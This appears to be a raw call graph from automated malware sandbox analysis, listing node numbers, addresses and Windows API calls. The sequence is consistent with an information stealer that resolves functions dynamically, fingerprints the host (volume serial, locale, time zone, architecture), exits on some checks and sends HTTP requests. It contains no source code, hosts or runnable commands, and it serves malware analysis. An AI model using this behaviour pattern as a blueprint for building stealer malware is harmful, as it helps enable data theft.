14142->14143 14144 2645c0 2 API calls 14143->14144 14145 263861 14144->14145 14146 2645c0 2 API calls 14145->14146 14147 26387a 14146->14147 14148 2645c0 2 API calls 14147->14148 14149 263893 14148->14149 14150 2645c0 2 API calls 14149->14150 14151 2638ac 14150->14151 14152 2645c0 2 API calls 14151->14152 14153 2638c5 14152->14153 14154 2645c0 2 API calls 14153->14154 14155 2638de 14154->14155 14156 2645c0 2 API calls 14155->14156 14157 2638f7 14156->14157 14158 2645c0 2 API calls 14157->14158 14159 263910 14158->14159 14160 2645c0 2 API calls 14159->14160 14161 263929 14160->14161 14162 2645c0 2 API calls 14161->14162 14163 263942 14162->14163 14164 2645c0 2 API calls 14163->14164 14165 26395b 14164->14165 14166 2645c0 2 API calls 14165->14166 14167 263974 14166->14167 14168 2645c0 2 API calls 14167->14168 14169 26398d 14168->14169 14170 2645c0 2 API calls 14169->14170 14171 2639a6 14170->14171 14172 2645c0 2 API calls 14171->14172 14173 2639bf 14172->14173 14174 2645c0 2 API calls 14173->14174 14175 2639d8 14174->14175 14176 2645c0 2 API calls 14175->14176 14177 2639f1 14176->14177 14178 2645c0 2 API calls 14177->14178 14179 263a0a 14178->14179 14180 2645c0 2 API calls 14179->14180 14181 263a23 14180->14181 14182 2645c0 2 API calls 14181->14182 14183 263a3c 14182->14183 14184 2645c0 2 API calls 14183->14184 14185 263a55 14184->14185 14186 2645c0 2 API calls 14185->14186 14187 263a6e 14186->14187 14188 2645c0 2 API calls 14187->14188 14189 263a87 14188->14189 14190 2645c0 2 API calls 14189->14190 14191 263aa0 14190->14191 14192 2645c0 2 API calls 14191->14192 14193 263ab9 14192->14193 14194 2645c0 2 API calls 14193->14194 14195 263ad2 14194->14195 14196 2645c0 2 API calls 14195->14196 14197 263aeb 14196->14197 14198 2645c0 2 API calls 14197->14198 14199 263b04 14198->14199 14200 2645c0 2 API calls 14199->14200 14201 263b1d 14200->14201 14202 2645c0 2 API calls 14201->14202 14203 263b36 14202->14203 14204 2645c0 2 API calls 14203->14204 14205 263b4f 14204->14205 14206 2645c0 2 API calls 14205->14206 14207 263b68 14206->14207 14208 2645c0 2 API calls 14207->14208 14209 263b81 14208->14209 14210 2645c0 2 API calls 14209->14210 14211 263b9a 14210->14211 14212 2645c0 2 API calls 14211->14212 14213 263bb3 14212->14213 14214 2645c0 2 API calls 14213->14214 14215 263bcc 14214->14215 14216 2645c0 2 API calls 14215->14216 14217 263be5 14216->14217 14218 2645c0 2 API calls 14217->14218 14219 263bfe 14218->14219 14220 2645c0 2 API calls 14219->14220 14221 263c17 14220->14221 14222 2645c0 2 API calls 14221->14222 14223 263c30 14222->14223 14224 2645c0 2 API calls 14223->14224 14225 263c49 14224->14225 14226 2645c0 2 API calls 14225->14226 14227 263c62 14226->14227 14228 2645c0 2 API calls 14227->14228 14229 263c7b 14228->14229 14230 2645c0 2 API calls 14229->14230 14231 263c94 14230->14231 14232 2645c0 2 API calls 14231->14232 14233 263cad 14232->14233 14234 2645c0 2 API calls 14233->14234 14235 263cc6 14234->14235 14236 2645c0 2 API calls 14235->14236 14237 263cdf 14236->14237 14238 2645c0 2 API calls 14237->14238 14239 263cf8 14238->14239 14240 2645c0 2 API calls 14239->14240 14241 263d11 14240->14241 14242 2645c0 2 API calls 14241->14242 14243 263d2a 14242->14243 14244 2645c0 2 API calls 14243->14244 14245 263d43 14244->14245 14246 2645c0 2 API calls 14245->14246 14247 263d5c 14246->14247 14248 2645c0 2 API calls 14247->14248 14249 263d75 14248->14249 14250 2645c0 2 API calls 14249->14250 14251 263d8e 14250->14251 14252 2645c0 2 API calls 14251->14252 14253 263da7 14252->14253 14254 2645c0 2 API calls 14253->14254 14255 263dc0 14254->14255 14256 2645c0 2 API calls 14255->14256 14257 263dd9 14256->14257 14258 2645c0 2 API calls 14257->14258 14259 263df2 14258->14259 14260 2645c0 2 API calls 14259->14260 14261 263e0b 14260->14261 14262 2645c0 2 API calls 14261->14262 14263 263e24 14262->14263 14264 2645c0 2 API calls 14263->14264 14265 263e3d 14264->14265 14266 2645c0 2 API calls 14265->14266 14267 263e56 14266->14267 14268 2645c0 2 API calls 14267->14268 14269 263e6f 14268->14269 14270 2645c0 2 API calls 14269->14270 14271 263e88 14270->14271 14272 2645c0 2 API calls 14271->14272 14273 263ea1 14272->14273 14274 2645c0 2 API calls 14273->14274 14275 263eba 14274->14275 14276 2645c0 2 API calls 14275->14276 14277 263ed3 14276->14277 14278 2645c0 2 API calls 14277->14278 14279 263eec 14278->14279 14280 2645c0 2 API calls 14279->14280 14281 263f05 14280->14281 14282 2645c0 2 API calls 14281->14282 14283 263f1e 14282->14283 14284 2645c0 2 API calls 14283->14284 14285 263f37 14284->14285 14286 2645c0 2 API calls 14285->14286 14287 263f50 14286->14287 14288 2645c0 2 API calls 14287->14288 14289 263f69 14288->14289 14290 2645c0 2 API calls 14289->14290 14291 263f82 14290->14291 14292 2645c0 2 API calls 14291->14292 14293 263f9b 14292->14293 14294 2645c0 2 API calls 14293->14294 14295 263fb4 14294->14295 14296 2645c0 2 API calls 14295->14296 14297 263fcd 14296->14297 14298 2645c0 2 API calls 14297->14298 14299 263fe6 14298->14299 14300 2645c0 2 API calls 14299->14300 14301 263fff 14300->14301 14302 2645c0 2 API calls 14301->14302 14303 264018 14302->14303 14304 2645c0 2 API calls 14303->14304 14305 264031 14304->14305 14306 2645c0 2 API calls 14305->14306 14307 26404a 14306->14307 14308 2645c0 2 API calls 14307->14308 14309 264063 14308->14309 14310 2645c0 2 API calls 14309->14310 14311 26407c 14310->14311 14312 2645c0 2 API calls 14311->14312 14313 264095 14312->14313 14314 2645c0 2 API calls 14313->14314 14315 2640ae 14314->14315 14316 2645c0 2 API calls 14315->14316 14317 2640c7 14316->14317 14318 2645c0 2 API calls 14317->14318 14319 2640e0 14318->14319 14320 2645c0 2 API calls 14319->14320 14321 2640f9 14320->14321 14322 2645c0 2 API calls 14321->14322 14323 264112 14322->14323 14324 2645c0 2 API calls 14323->14324 14325 26412b 14324->14325 14326 2645c0 2 API calls 14325->14326 14327 264144 14326->14327 14328 2645c0 2 API calls 14327->14328 14329 26415d 14328->14329 14330 2645c0 2 API calls 14329->14330 14331 264176 14330->14331 14332 2645c0 2 API calls 14331->14332 14333 26418f 14332->14333 14334 2645c0 2 API calls 14333->14334 14335 2641a8 14334->14335 14336 2645c0 2 API calls 14335->14336 14337 2641c1 14336->14337 14338 2645c0 2 API calls 14337->14338 14339 2641da 14338->14339 14340 2645c0 2 API calls 14339->14340 14341 2641f3 14340->14341 14342 2645c0 2 API calls 14341->14342 14343 26420c 14342->14343 14344 2645c0 2 API calls 14343->14344 14345 264225 14344->14345 14346 2645c0 2 API calls 14345->14346 14347 26423e 14346->14347 14348 2645c0 2 API calls 14347->14348 14349 264257 14348->14349 14350 2645c0 2 API calls 14349->14350 14351 264270 14350->14351 14352 2645c0 2 API calls 14351->14352 14353 264289 14352->14353 14354 2645c0 2 API calls 14353->14354 14355 2642a2 14354->14355 14356 2645c0 2 API calls 14355->14356 14357 2642bb 14356->14357 14358 2645c0 2 API calls 14357->14358 14359 2642d4 14358->14359 14360 2645c0 2 API calls 14359->14360 14361 2642ed 14360->14361 14362 2645c0 2 API calls 14361->14362 14363 264306 14362->14363 14364 2645c0 2 API calls 14363->14364 14365 26431f 14364->14365 14366 2645c0 2 API calls 14365->14366 14367 264338 14366->14367 14368 2645c0 2 API calls 14367->14368 14369 264351 14368->14369 14370 2645c0 2 API calls 14369->14370 14371 26436a 14370->14371 14372 2645c0 2 API calls 14371->14372 14373 264383 14372->14373 14374 2645c0 2 API calls 14373->14374 14375 26439c 14374->14375 14376 2645c0 2 API calls 14375->14376 14377 2643b5 14376->14377 14378 2645c0 2 API calls 14377->14378 14379 2643ce 14378->14379 14380 2645c0 2 API calls 14379->14380 14381 2643e7 14380->14381 14382 2645c0 2 API calls 14381->14382 14383 264400 14382->14383 14384 2645c0 2 API calls 14383->14384 14385 264419 14384->14385 14386 2645c0 2 API calls 14385->14386 14387 264432 14386->14387 14388 2645c0 2 API calls 14387->14388 14389 26444b 14388->14389 14390 2645c0 2 API calls 14389->14390 14391 264464 14390->14391 14392 2645c0 2 API calls 14391->14392 14393 26447d 14392->14393 14394 2645c0 2 API calls 14393->14394 14395 264496 14394->14395 14396 2645c0 2 API calls 14395->14396 14397 2644af 14396->14397 14398 2645c0 2 API calls 14397->14398 14399 2644c8 14398->14399 14400 2645c0 2 API calls 14399->14400 14401 2644e1 14400->14401 14402 2645c0 2 API calls 14401->14402 14403 2644fa 14402->14403 14404 2645c0 2 API calls 14403->14404 14405 264513 14404->14405 14406 2645c0 2 API calls 14405->14406 14407 26452c 14406->14407 14408 2645c0 2 API calls 14407->14408 14409 264545 14408->14409 14410 2645c0 2 API calls 14409->14410 14411 26455e 14410->14411 14412 2645c0 2 API calls 14411->14412 14413 264577 14412->14413 14414 2645c0 2 API calls 14413->14414 14415 264590 14414->14415 14416 2645c0 2 API calls 14415->14416 14417 2645a9 14416->14417 14418 279c10 14417->14418 14419 27a036 8 API calls 14418->14419 14420 279c20 43 API calls 14418->14420 14421 27a146 14419->14421 14422 27a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14419->14422 14420->14419 14423 27a216 14421->14423 14424 27a153 8 API calls 14421->14424 14422->14421 14425 27a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14423->14425 14426 27a298 14423->14426 14424->14423 14425->14426 14427 27a337 14426->14427 14428 27a2a5 6 API calls 14426->14428 14429 27a344 9 API calls 14427->14429 14430 27a41f 14427->14430 14428->14427 14429->14430 14431 27a4a2 14430->14431 14432 27a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14430->14432 14433 27a4dc 14431->14433 14434 27a4ab GetProcAddress GetProcAddress 14431->14434 14432->14431 14435 27a515 14433->14435 14436 27a4e5 GetProcAddress GetProcAddress 14433->14436 14434->14433 14437 27a612 14435->14437 14438 27a522 10 API calls 14435->14438 14436->14435 14439 27a67d 14437->14439 14440 27a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14437->14440 14438->14437 14441 27a686 GetProcAddress 14439->14441 14442 27a69e 14439->14442 14440->14439 14441->14442 14443 27a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14442->14443 14444 275ca3 14442->14444 14443->14444 14445 261590 14444->14445 15564 261670 14445->15564 14448 27a7a0 lstrcpy 14449 2615b5 14448->14449 14450 27a7a0 lstrcpy 14449->14450 14451 2615c7 14450->14451 14452 27a7a0 lstrcpy 14451->14452 14453 2615d9 14452->14453 14454 27a7a0 lstrcpy 14453->14454 14455 261663 14454->14455 14456 275510 14455->14456 14457 275521 14456->14457 14458 27a820 2 API calls 14457->14458 14459 27552e 14458->14459 14460 27a820 2 API calls 14459->14460 14461 27553b 14460->14461 14462 27a820 2 API calls 14461->14462 14463 275548 14462->14463 14464 27a740 lstrcpy 14463->14464 14465 275555 14464->14465 14466 27a740 lstrcpy 14465->14466 14467 275562 14466->14467 14468 27a740 lstrcpy 14467->14468 14469 27556f 14468->14469 14470 27a740 lstrcpy 14469->14470 14509 27557c 14470->14509 14471 261590 lstrcpy 14471->14509 14472 2752c0 25 API calls 14472->14509 14473 275643 StrCmpCA 14473->14509 14474 2756a0 StrCmpCA 14475 2757dc 14474->14475 14474->14509 14476 27a8a0 lstrcpy 14475->14476 14477 2757e8 14476->14477 14478 27a820 2 API calls 14477->14478 14479 2757f6 14478->14479 14481 27a820 2 API calls 14479->14481 14480 275856 StrCmpCA 14482 275991 14480->14482 14480->14509 14486 275805 14481->14486 14485 27a8a0 lstrcpy 14482->14485 14483 27a740 lstrcpy 14483->14509 14484 27a8a0 lstrcpy 14484->14509 14487 27599d 14485->14487 14488 261670 lstrcpy 14486->14488 14490 27a820 2 API calls 14487->14490 14508 275811 14488->14508 14489 27a820 lstrlen lstrcpy 14489->14509 14491 2759ab 14490->14491 14494 27a820 2 API calls 14491->14494 14492 275a0b StrCmpCA 14495 275a16 Sleep 14492->14495 14496 275a28 14492->14496 14493 27a7a0 lstrcpy 14493->14509 14498 2759ba 14494->14498 14495->14509 14497 27a8a0 lstrcpy 14496->14497 14499 275a34 14497->14499 14500 261670 lstrcpy 14498->14500 14501 27a820 2 API calls 14499->14501 14500->14508 14502 275a43 14501->14502 14503 27a820 2 API calls 14502->14503 14504 275a52 14503->14504 14506 261670 lstrcpy 14504->14506 14505 27578a StrCmpCA 14505->14509 14506->14508 14507 27593f StrCmpCA 14507->14509 14508->13563 14509->14471 14509->14472 14509->14473 14509->14474 14509->14480 14509->14483 14509->14484 14509->14489 14509->14492 14509->14493 14509->14505 14509->14507 14510 2751f0 20 API calls 14509->14510 14510->14509 14512 277553 GetVolumeInformationA 14511->14512 14513 27754c 14511->14513 14514 277591 14512->14514 14513->14512 14515 2775fc GetProcessHeap RtlAllocateHeap 14514->14515 14516 277619 14515->14516 14517 277628 wsprintfA 14515->14517 14519 27a740 lstrcpy 14516->14519 14518 27a740 lstrcpy 14517->14518 14520 275da7 14518->14520 14519->14520 14520->13584 14522 27a7a0 lstrcpy 14521->14522 14523 264899 14522->14523 15573 2647b0 14523->15573 14525 2648a5 14526 27a740 lstrcpy 14525->14526 14527 2648d7 14526->14527 14528 27a740 lstrcpy 14527->14528 14529 2648e4 14528->14529 14530 27a740 lstrcpy 14529->14530 14531 2648f1 14530->14531 14532 27a740 lstrcpy 14531->14532 14533 2648fe 14532->14533 14534 27a740 lstrcpy 14533->14534 14535 26490b InternetOpenA StrCmpCA 14534->14535 14536 264944 14535->14536 14537 264ecb InternetCloseHandle 14536->14537 15579 278b60 14536->15579 14539 264ee8 14537->14539 15594 269ac0 CryptStringToBinaryA 14539->15594 14540 264963 15587 27a920 14540->15587 14544 264976 14545 27a8a0 lstrcpy 14544->14545 14550 26497f 14545->14550 14546 27a820 2 API calls 14547 264f05 14546->14547 14548 27a9b0 4 API calls 14547->14548 14551 264f1b 14548->14551 14549 264f27 ctype 14552 27a7a0 lstrcpy 14549->14552 14554 27a9b0 4 API calls 14550->14554 14553 27a8a0 lstrcpy 14551->14553 14565 264f57 14552->14565 14553->14549 14555 2649a9 14554->14555 14556 27a8a0 lstrcpy 14555->14556 14557 2649b2 14556->14557 14558 27a9b0 4 API calls 14557->14558 14559 2649d1 14558->14559 14560 27a8a0 lstrcpy 14559->14560 14561 2649da 14560->14561 14562 27a920 3 API calls 14561->14562 14563 2649f8 14562->14563 14564 27a8a0 lstrcpy 14563->14564 14566 264a01 14564->14566 14565->13587 14567 27a9b0 4 API calls 14566->14567 14568 264a20 14567->14568 14569 27a8a0 lstrcpy 14568->14569 14570 264a29 14569->14570 14571 27a9b0 4 API calls 14570->14571 14572 264a48 14571->14572 14573 27a8a0 lstrcpy 14572->14573 14574 264a51 14573->14574 14575 27a9b0 4 API calls 14574->14575 14576 264a7d 14575->14576 14577 27a920 3 API calls 14576->14577 14578 264a84 14577->14578 14579 27a8a0 lstrcpy 14578->14579 14580 264a8d 14579->14580 14581 264aa3 InternetConnectA 14580->14581 14581->14537 14582 264ad3 HttpOpenRequestA 14581->14582 14584 264ebe InternetCloseHandle 14582->14584 14585 264b28 14582->14585 14584->14537 14586 27a9b0 4 API calls 14585->14586 14587 264b3c 14586->14587 14588 27a8a0 lstrcpy 14587->14588 14589 264b45 14588->14589 14590 27a920 3 API calls 14589->14590 14591 264b63 14590->14591 14592 27a8a0 lstrcpy 14591->14592 14593 264b6c 14592->14593 14594 27a9b0 4 API calls 14593->14594 14595 264b8b 14594->14595 14596 27a8a0 lstrcpy 14595->14596 14597 264b94 14596->14597 14598 27a9b0 4 API calls 14597->14598 14599 264bb5 14598->14599 14600 27a8a0 lstrcpy 14599->14600 14601 264bbe 14600->14601 14602 27a9b0 4 API calls 14601->14602 14603 264bde 14602->14603 14604 27a8a0 lstrcpy 14603->14604 14605 264be7 14604->14605 14606 27a9b0 4 API calls 14605->14606 14607 264c06 14606->14607 14608 27a8a0 lstrcpy 14607->14608 14609 264c0f 14608->14609 14610 27a920 3 API calls 14609->14610 14611 264c2d 14610->14611 14612 27a8a0 lstrcpy 14611->14612 14613 264c36 14612->14613 14614 27a9b0 4 API calls 14613->14614 14615 264c55 14614->14615 14616 27a8a0 lstrcpy 14615->14616 14617 264c5e 14616->14617 14618 27a9b0 4 API calls 14617->14618 14619 264c7d 14618->14619 14620 27a8a0 lstrcpy 14619->14620 14621 264c86 14620->14621 14622 27a920 3 API calls 14621->14622 14623 264ca4 14622->14623 14624 27a8a0 lstrcpy 14623->14624 14625 264cad 14624->14625 14626 27a9b0 4 API calls 14625->14626 14627 264ccc 14626->14627 14628 27a8a0 lstrcpy 14627->14628 14629 264cd5 14628->14629 14630 27a9b0 4 API calls 14629->14630 14631 264cf6 14630->14631 14632 27a8a0 lstrcpy 14631->14632 14633 264cff 14632->14633 14634 27a9b0 4 API calls 14633->14634 14635 264d1f 14634->14635 14636 27a8a0 lstrcpy 14635->14636 14637 264d28 14636->14637 14638 27a9b0 4 API calls 14637->14638 14639 264d47 14638->14639 14640 27a8a0 lstrcpy 14639->14640 14641 264d50 14640->14641 14642 27a920 3 API calls 14641->14642 14643 264d6e 14642->14643 14644 27a8a0 lstrcpy 14643->14644 14645 264d77 14644->14645 14646 27a740 lstrcpy 14645->14646 14647 264d92 14646->14647 14648 27a920 3 API calls 14647->14648 14649 264db3 14648->14649 14650 27a920 3 API calls 14649->14650 14651 264dba 14650->14651 14652 27a8a0 lstrcpy 14651->14652 14653 264dc6 14652->14653 14654 264de7 lstrlen 14653->14654 14655 264dfa 14654->14655 14656 264e03 lstrlen 14655->14656 15593 27aad0 14656->15593 14658 264e13 HttpSendRequestA 14659 264e32 InternetReadFile 14658->14659 14660 264e67 InternetCloseHandle 14659->14660 14665 264e5e 14659->14665 14663 27a800 14660->14663 14662 27a9b0 4 API calls 14662->14665 14663->14584 14664 27a8a0 lstrcpy 14664->14665 14665->14659 14665->14660 14665->14662 14665->14664 15600 27aad0 14666->15600 14668 2717c4 StrCmpCA 14669 2717cf ExitProcess 14668->14669 14670 2717d7 14668->14670 14671 2719c2 14670->14671 14672 2718cf StrCmpCA 14670->14672 14673 2718ad StrCmpCA 14670->14673 14674 271913 StrCmpCA 14670->14674 14675 271932 StrCmpCA 14670->14675 14676 2718f1 StrCmpCA 14670->14676 14677 271951 StrCmpCA 14670->14677 14678 271970 StrCmpCA 14670->14678 14679 27187f StrCmpCA 14670->14679 14680 27185d StrCmpCA 14670->14680 14681 27a820 lstrlen lstrcpy 14670->14681 14671->13589 14672->14670 14673->14670 14674->14670 14675->14670 14676->14670 14677->14670 14678->14670 14679->14670 14680->14670 14681->14670 14683 27a7a0 lstrcpy 14682->14683 14684 265979 14683->14684 14685 2647b0 2 API calls 14684->14685 14686 265985 14685->14686 14687 27a740 lstrcpy 14686->14687 14688 2659ba 14687->14688 14689 27a740 lstrcpy 14688->14689 14690 2659c7 14689->14690 14691 27a740 lstrcpy 14690->14691 14692 2659d4 14691->14692 14693 27a740 lstrcpy 14692->14693 14694 2659e1 14693->14694 14695 27a740 lstrcpy 14694->14695 14696 2659ee InternetOpenA StrCmpCA 14695->14696 14697 265a1d 14696->14697 14698 265fc3 InternetCloseHandle 14697->14698 14700 278b60 3 API calls 14697->14700 14699 265fe0 14698->14699 14702 269ac0 4 API calls 14699->14702 14701 265a3c 14700->14701 14703 27a920 3 API calls 14701->14703 14705 265fe6 14702->14705 14704 265a4f 14703->14704 14706 27a8a0 lstrcpy 14704->14706 14707 27a820 2 API calls 14705->14707 14709 26601f ctype 14705->14709 14711 265a58 14706->14711 14708 265ffd 14707->14708 14710 27a9b0 4 API calls 14708->14710 14713 27a7a0 lstrcpy 14709->14713 14712 266013 14710->14712 14715 27a9b0 4 API calls 14711->14715 14714 27a8a0 lstrcpy 14712->14714 14724 26604f 14713->14724 14714->14709 14716 265a82 14715->14716 14717 27a8a0 lstrcpy 14716->14717 14718 265a8b 14717->14718 14719 27a9b0 4 API calls 14718->14719 14720 265aaa 14719->14720 14721 27a8a0 lstrcpy 14720->14721 14722 265ab3 14721->14722 14723 27a920 3 API calls 14722->14723 14725 265ad1 14723->14725 14724->13595 14726 27a8a0 lstrcpy 14725->14726 14727 265ada 14726->14727 14728 27a9b0 4 API calls 14727->14728 14729 265af9 14728->14729 14730 27a8a0 lstrcpy 14729->14730 14731 265b02 14730->14731 14732 27a9b0 4 API calls 14731->14732 14733 265b21 14732->14733 14734 27a8a0 lstrcpy 14733->14734 14735 265b2a 14734->14735 14736 27a9b0 4 API calls 14735->14736 14737 265b56 14736->14737 14738 27a920 3 API calls 14737->14738 14739 265b5d 14738->14739 14740 27a8a0 lstrcpy 14739->14740 14741 265b66 14740->14741 14742 265b7c InternetConnectA 14741->14742 14742->14698 14743 265bac HttpOpenRequestA 14742->14743 14745 265fb6 InternetCloseHandle 14743->14745 14746 265c0b 14743->14746 14745->14698 14747 27a9b0 4 API calls 14746->14747 14748 265c1f 14747->14748 14749 27a8a0 lstrcpy 14748->14749 14750 265c28 14749->14750 14751 27a920 3 API calls 14750->14751 14752 265c46 14751->14752 14753 27a8a0 lstrcpy 14752->14753 14754 265c4f 14753->14754 14755 27a9b0 4 API calls 14754->14755 14756 265c6e 14755->14756 14757 27a8a0 lstrcpy 14756->14757 14758 265c77 14757->14758 14759 27a9b0 4 API calls 14758->14759 14760 265c98 14759->14760 14761 27a8a0 lstrcpy 14760->14761 14762 265ca1 14761->14762 14763 27a9b0 4 API calls 14762->14763 14764 265cc1 14763->14764 14765 27a8a0 lstrcpy 14764->14765 14766 265cca 14765->14766 14767 27a9b0 4 API calls 14766->14767 14768 265ce9 14767->14768 14769 27a8a0 lstrcpy 14768->14769 14770 265cf2 14769->14770 14771 27a920 3 API calls 14770->14771 14772 265d10 14771->14772 14773 27a8a0 lstrcpy 14772->14773 14774 265d19 14773->14774 14775 27a9b0 4 API calls 14774->14775 14776 265d38 14775->14776 14777 27a8a0 lstrcpy 14776->14777 14778 265d41 14777->14778 14779 27a9b0 4 API calls 14778->14779 14780 265d60 14779->14780 14781 27a8a0 lstrcpy 14780->14781 14782 265d69 14781->14782 14783 27a920 3 API calls 14782->14783 14784 265d87 14783->14784 14785 27a8a0 lstrcpy 14784->14785 14786 265d90 14785->14786 14787 27a9b0 4 API calls 14786->14787 14788 265daf 14787->14788 14789 27a8a0 lstrcpy 14788->14789 14790 265db8 14789->14790 14791 27a9b0 4 API calls 14790->14791 14792 265dd9 14791->14792 14793 27a8a0 lstrcpy 14792->14793 14794 265de2 14793->14794 14795 27a9b0 4 API calls 14794->14795 14796 265e02 14795->14796 14797 27a8a0 lstrcpy 14796->14797 14798 265e0b 14797->14798 14799 27a9b0 4 API calls 14798->14799 14800 265e2a 14799->14800 14801 27a8a0 lstrcpy 14800->14801 14802 265e33 14801->14802 14803 27a920 3 API calls 14802->14803 14804 265e54 14803->14804 14805 27a8a0 lstrcpy 14804->14805 14806 265e5d 14805->14806 14807 265e70 lstrlen 14806->14807 15601 27aad0 14807->15601 14809 265e81 lstrlen GetProcessHeap RtlAllocateHeap 15602 27aad0 14809->15602 14811 265eae lstrlen 14812 265ebe 14811->14812 14813 265ed7 lstrlen 14812->14813 14814 265ee7 14813->14814 14815 265ef0 lstrlen 14814->14815 14816 265f04 14815->14816 14817 265f1a lstrlen 14816->14817 15603 27aad0 14817->15603 14819 265f2a HttpSendRequestA 14820 265f35 InternetReadFile 14819->14820 14821 265f6a InternetCloseHandle 14820->14821 14825 265f61 14820->14825 14821->14745 14823 27a9b0 4 API calls 14823->14825 14824 27a8a0 lstrcpy 14824->14825 14825->14820 14825->14821 14825->14823 14825->14824 14827 271077 14826->14827 14828 271151 14827->14828 14829 27a820 lstrlen lstrcpy 14827->14829 14828->13597 14829->14827 14831 270db7 14830->14831 14832 270f17 14831->14832 14833 270e27 StrCmpCA 14831->14833 14834 270e67 StrCmpCA 14831->14834 14835 270ea4 StrCmpCA 14831->14835 14836 27a820 lstrlen lstrcpy 14831->14836 14832->13605 14833->14831 14834->14831 14835->14831 14836->14831 14840 270f67 14837->14840 14838 271044 14838->13613 14839 270fb2 StrCmpCA 14839->14840 14840->14838 14840->14839 14841 27a820 lstrlen lstrcpy 14840->14841 14841->14840 14843 27a740 lstrcpy 14842->14843 14844 271a26 14843->14844 14845 27a9b0 4 API calls 14844->14845 14846 271a37 14845->14846 14847 27a8a0 lstrcpy 14846->14847 14848 271a40 14847->14848 14849 27a9b0 4 API calls 14848->14849 14850 271a5b 14849->14850 14851 27a8a0 lstrcpy 14850->14851 14852 271a64 14851->14852 14853 27a9b0 4 API calls 14852->14853 14854 271a7d 14853->14854 14855 27a8a0 lstrcpy 14854->14855 14856 271a86 14855->14856 14857 27a9b0 4 API calls 14856->14857 14858 271aa1 14857->14858 14859 27a8a0 lstrcpy 14858->14859 14860 271aaa 14859->14860 14861 27a9b0 4 API calls 14860->14861 14862 271ac3 14861->14862 14863 27a8a0 lstrcpy 14862->14863 14864 271acc 14863->14864 14865 27a9b0 4 API calls 14864->14865 14866 271ae7 14865->14866 14867 27a8a0 lstrcpy 14866->14867 14868 271af0 14867->14868 14869 27a9b0 4 API calls 14868->14869 14870 271b09 14869->14870 14871 27a8a0 lstrcpy 14870->14871 14872 271b12 14871->14872 14873 27a9b0 4 API calls 14872->14873 14874 271b2d 14873->14874 14875 27a8a0 lstrcpy 14874->14875 14876 271b36 14875->14876 14877 27a9b0 4 API calls 14876->14877 14878 271b4f 14877->14878 14879 27a8a0 lstrcpy 14878->14879 14880 271b58 14879->14880 14881 27a9b0 4 API calls 14880->14881 14882 271b76 14881->14882 14883 27a8a0 lstrcpy 14882->14883 14884 271b7f 14883->14884 14885 277500 6 API calls 14884->14885 14886 271b96 14885->14886 14887 27a920 3 API calls 14886->14887 14888 271ba9 14887->14888 14889 27a8a0 lstrcpy 14888->14889 14890 271bb2 14889->14890 14891 27a9b0 4 API calls 14890->14891 14892 271bdc 14891->14892 14893 27a8a0 lstrcpy 14892->14893 14894 271be5 14893->14894 14895 27a9b0 4 API calls 14894->14895 14896 271c05 14895->14896 14897 27a8a0 lstrcpy 14896->14897 14898 271c0e 14897->14898 15604 277690 GetProcessHeap RtlAllocateHeap 14898->15604 14901 27a9b0 4 API calls 14902 271c2e 14901->14902 14903 27a8a0 lstrcpy 14902->14903 14904 271c37 14903->14904 14905 27a9b0 4 API calls 14904->14905 14906 271c56 14905->14906 14907 27a8a0 lstrcpy 14906->14907 14908 271c5f 14907->14908 14909 27a9b0 4 API calls 14908->14909 14910 271c80 14909->14910 14911 27a8a0 lstrcpy 14910->14911 14912 271c89 14911->14912 15611 2777c0 GetCurrentProcess IsWow64Process 14912->15611 14915 27a9b0 4 API calls 14916 271ca9 14915->14916 14917 27a8a0 lstrcpy 14916->14917 14918 271cb2 14917->14918 14919 27a9b0 4 API calls 14918->14919 14920 271cd1 14919->14920 14921 27a8a0 lstrcpy 14920->14921 14922 271cda 14921->14922 14923 27a9b0 4 API calls 14922->14923 14924 271cfb 14923->14924 14925 27a8a0 lstrcpy 14924->14925 14926 271d04 14925->14926 14927 277850 3 API calls 14926->14927 14928 271d14 14927->14928 14929 27a9b0 4 API calls 14928->14929 14930 271d24 14929->14930 14931 27a8a0 lstrcpy 14930->14931 14932 271d2d 14931->14932 14933 27a9b0 4 API calls 14932->14933 14934 271d4c 14933->14934 14935 27a8a0 lstrcpy 14934->14935 14936 271d55 14935->14936 14937 27a9b0 4 API calls 14936->14937 14938 271d75 14937->14938 14939 27a8a0 lstrcpy 14938->14939 14940 271d7e 14939->14940 14941 2778e0 3 API calls 14940->14941 14942 271d8e 14941->14942 14943 27a9b0 4 API calls 14942->14943 14944 271d9e 14943->14944 14945 27a8a0 lstrcpy 14944->14945 14946 271da7 14945->14946 14947 27a9b0 4 API calls 14946->14947 14948 271dc6 14947->14948 14949 27a8a0 lstrcpy 14948->14949 14950 271dcf 14949->14950 14951 27a9b0 4 API calls 14950->14951 14952 271df0 14951->14952 14953 27a8a0 lstrcpy 14952->14953 14954 271df9 14953->14954 15613 277980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14954->15613 14957 27a9b0 4 API calls 14958 271e19 14957->14958 14959 27a8a0 lstrcpy 14958->14959 14960 271e22 14959->14960 14961 27a9b0 4 API calls 14960->14961 14962 271e41 14961->14962 14963 27a8a0 lstrcpy 14962->14963 14964 271e4a 14963->14964 14965 27a9b0 4 API calls 14964->14965 14966 271e6b 14965->14966 14967 27a8a0 lstrcpy 14966->14967 14968 271e74 14967->14968 15615 277a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14968->15615 14971 27a9b0 4 API calls 14972 271e94 14971->14972 14973 27a8a0 lstrcpy 14972->14973 14974 271e9d 14973->14974 14975 27a9b0 4 API calls 14974->14975 14976 271ebc 14975->14976 14977 27a8a0 lstrcpy 14976->14977 14978 271ec5 14977->14978 14979 27a9b0 4 API calls 14978->14979 14980 271ee5 14979->14980 14981 27a8a0 lstrcpy 14980->14981 14982 271eee 14981->14982 15618 277b00 GetUserDefaultLocaleName 14982->15618 14985 27a9b0 4 API calls 14986 271f0e 14985->14986 14987 27a8a0 lstrcpy 14986->14987 14988 271f17 14987->14988 14989 27a9b0 4 API calls 14988->14989 14990 271f36 14989->14990 14991 27a8a0 lstrcpy 14990->14991 14992 271f3f 14991->14992 14993 27a9b0 4 API calls 14992->14993 14994 271f60 14993->14994 14995 27a8a0 lstrcpy 14994->14995 14996 271f69 14995->14996 15622 277b90 14996->15622 14998 271f80 14999 27a920 3 API calls 14998->14999 15000 271f93 14999->15000 15001 27a8a0 lstrcpy 15000->15001 15002 